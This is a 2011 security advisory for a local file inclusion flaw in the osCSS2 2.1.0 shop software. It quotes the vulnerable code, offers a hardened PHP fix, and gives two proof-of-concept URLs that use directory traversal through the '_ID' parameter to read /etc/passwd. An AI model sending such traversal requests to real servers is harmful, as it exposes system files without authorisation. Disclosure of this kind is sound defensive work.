osCSS2 2.1.0 Local File Inclusion

2011-11-09T00:00:00
ID PACKETSTORM:106758
Type packetstorm
Reporter Stefan Schurtz
Modified 2011-11-09T00:00:00

Description

Advisory: osCSS2 "_ID" parameter Local file inclusion  
Advisory ID: SSCHADV2011-034  
Author: Stefan Schurtz  
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)  
Vendor URL: http://oscss.org/  
Vendor Status: Fixed in svn branch 2.1.0 and reported for the development version 2.1.1  
  
==========================  
Vulnerability Description  
==========================  
  
osCSS2 2.1.0 is vulnerable to local file inclusion (LFI) through the "_ID" parameter.  
  
==========================  
Vulnerable code  
==========================  
  
//.htaccess  
// Requests for shopping_cart.php are rewritten to content.php; the query string  
// (and with it a user-supplied _ID) is appended unchanged.  
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}  
  
//content.php  
// The page path derived from _ID is passed straight to require().  
require($page->path_gabarit());  
  
// includes/classes/page.php  
public function pile_file_lang($path_file){  
    global $lang;  
    // Only a string-prefix check: a path that does not start with DIR_FS_CATALOG  
    // gets it prepended, but "../" sequences inside the path are never removed,  
    // so the final path can still resolve outside the catalog directory.  
    if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;  
  
    if(!in_array($path_file,(array)$this->PileFileLang))  
        include_once($path_file);  
}  
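
A hardened way to resolve a user-supplied page name before including it, as an added example that is not osCSS2's own code: the candidate is restricted to a plain file name, canonicalised with realpath(), and included only if it resolves inside DIR_FS_CATALOG. Apart from DIR_FS_CATALOG, which the advisory names, every function, constant and path below is an assumption.

```php
<?php
// Added example, not osCSS2 code. DIR_FS_CATALOG is the catalog root
// constant from the advisory; the value and everything else here are assumed.
define('DIR_FS_CATALOG', '/var/www/catalog/');

// Resolve a page name taken from request input (e.g. the _ID parameter) to a
// file that is guaranteed to lie inside DIR_FS_CATALOG, or null if it must
// be refused.
function safe_catalog_path(string $requested): ?string
{
    $root = realpath(DIR_FS_CATALOG);
    if ($root === false) {
        return null; // catalog root missing: refuse rather than guess
    }
    // Allow-list rule: a bare script name, no separators and no "..".
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $requested)) {
        return null;
    }
    // realpath() collapses "." / ".." and follows symlinks, so the result is
    // the file that would actually be opened.
    $resolved = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($resolved === false) {
        return null; // no such file
    }
    // Backstop: the canonical path must sit below the canonical root. This
    // is the check the prefix comparison in pile_file_lang() does not do,
    // because it compared the raw, unresolved string.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

// Drop-in replacement for an unchecked require($page->path_gabarit()).
function include_catalog_page(string $requested): void
{
    $path = safe_catalog_path($requested);
    if ($path === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    require $path;
}
```

With this in place a value such as `../../../../etc/passwd` fails the allow-list before any filesystem access, and a symlink inside the catalog that points outside it fails the realpath prefix check.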
  
==================  
PoC-Exploit  
==================  
  
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd  
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd  
  
=========  
Solution  
=========  
  
Fixed in svn branch 2.1.0 and reported for the development version 2.1.1  
  
====================  
Disclosure Timeline  
====================  
  
08-Nov-2011 - informed vendor  
08-Nov-2011 - release date of this security advisory  
08-Nov-2011 - fixed by vendor  
  
========  
Credits  
========  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://oscss.org/  
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html  
http://dev.oscss.org/task/892  
http://www.rul3z.de/advisories/SSCHADV2011-034.txt  